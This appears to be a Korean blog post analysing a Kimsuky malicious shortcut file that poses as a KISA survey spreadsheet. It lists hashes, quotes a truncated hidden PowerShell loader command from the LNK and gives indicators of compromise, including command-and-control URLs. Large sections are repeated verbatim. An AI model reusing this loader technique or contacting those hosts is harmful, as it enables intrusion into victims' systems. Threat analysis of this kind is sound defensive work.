김수키(Kimsuky) 한국 인터넷 진흥원(KISA) 사칭 악성코드-현황조사표.xlsx.lnk(2023.8.11)
Contents
오늘은 한국 인터넷 진흥원 사칭 악성코드인 현황조사표.xlsx.lnk(2023.8.11) 에 대해 글을 적어 보겠습니다. 일단 언제나 우리를 배신하지 않는 김수키(Kimsuky) 입니다.
한국인터넷진흥원(KISA)은 IP 주소 관리 및 DNS 관리를 맡고 있으며, 주민등록번호 아이핀 등 이용자 정보 보호 정책을 추진하고 있으며 과학기술정보통신부 산하 위탁집행형 준정부기관입니다. 일단 해당 악성코드는 LNK 방식을 사용하고 있으면 해당 동작 방법은 간단합니다. 링크 파일인 것처럼 해서 실행을 하게 하고 그리고 해당 악성코드를 실행하면 powershell 이 실행이 되고 악성코드가 동작하는 방식을 사용하고 있습니다.
현황조사표.xlsx.lnk
디코이:현황조사표.xlsx
66165dfb784cbcb442e4767f0ca4f469
입니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:현황조사표.xlsx.lnk
사이즈:24.7 MB
CRC32:26c7e313
MD5:0eb8db3cbde470407f942fd63afe42b8
SHA-1:b93c13204acb4819c7688f847b1470ac25df52b3
SHA-256:a39831ecbe0792adf87f63fb99557356ba688e5f6da8c2b058d2a3d0f0d7d1e4
그냥 Cerbero Suite Advanced로 보면 다음과 같이 악성코드 동작을 하는 코드를 쉽게 파악할 수가 있습니다.
그러며 해당 악성코드는 핵심은 다음과 같습니다.
StringData
{
namestring: not present
relativepath: not present
workingdir: not present
commandlinearguments: /c powershell -windo(w)(style hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyH(W)PSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\현황조사표.xlsx';sc $tyxkEP …
한국인터넷진흥원(KISA)은 IP 주소 관리 및 DNS 관리를 맡고 있으며, 주민등록번호 아이핀 등 이용자 정보 보호 정책을 추진하고 있으며 과학기술정보통신부 산하 위탁집행형 준정부기관입니다. 일단 해당 악성코드는 LNK 방식을 사용하고 있으면 해당 동작 방법은 간단합니다. 링크 파일인 것처럼 해서 실행을 하게 하고 그리고 해당 악성코드를 실행하면 powershell 이 실행이 되고 악성코드가 동작하는 방식을 사용하고 있습니다.
현황조사표.xlsx.lnk
디코이:현황조사표.xlsx
66165dfb784cbcb442e4767f0ca4f469
입니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:현황조사표.xlsx.lnk
사이즈:24.7 MB
CRC32:26c7e313
MD5:0eb8db3cbde470407f942fd63afe42b8
SHA-1:b93c13204acb4819c7688f847b1470ac25df52b3
SHA-256:a39831ecbe0792adf87f63fb99557356ba688e5f6da8c2b058d2a3d0f0d7d1e4
그냥 Cerbero Suite Advanced로 보면 다음과 같이 악성코드 동작을 하는 코드를 쉽게 파악할 수가 있습니다.
그러며 해당 악성코드는 핵심은 다음과 같습니다.
StringData
{
namestring: not present
relativepath: not present
workingdir: not present
commandlinearguments: /c powershell -windo(w)(style hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyH(W)PSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\현황조사표.xlsx';sc $tyxkEP …
IoC
0eb8db3cbde470407f942fd63afe42b8
2d444b6f72c8327d1d155faa2cca7fd7
66165dfb784cbcb442e4767f0ca4f469
75.119.136.207
a39831ecbe0792adf87f63fb99557356ba688e5f6da8c2b058d2a3d0f0d7d1e4
b93c13204acb4819c7688f847b1470ac25df52b3
d9144b0da0d1ea7671667ffcd85448436e174486
ebd20c8c63690965267c97348f4db89cb73c9974c68a586862d73a339a05e677
http://75.119.136.207/config/bases/config.php
http://bian0151.cafe24.com/admin/board/1.html
2d444b6f72c8327d1d155faa2cca7fd7
66165dfb784cbcb442e4767f0ca4f469
75.119.136.207
a39831ecbe0792adf87f63fb99557356ba688e5f6da8c2b058d2a3d0f0d7d1e4
b93c13204acb4819c7688f847b1470ac25df52b3
d9144b0da0d1ea7671667ffcd85448436e174486
ebd20c8c63690965267c97348f4db89cb73c9974c68a586862d73a339a05e677
http://75.119.136.207/config/bases/config.php
http://bian0151.cafe24.com/admin/board/1.html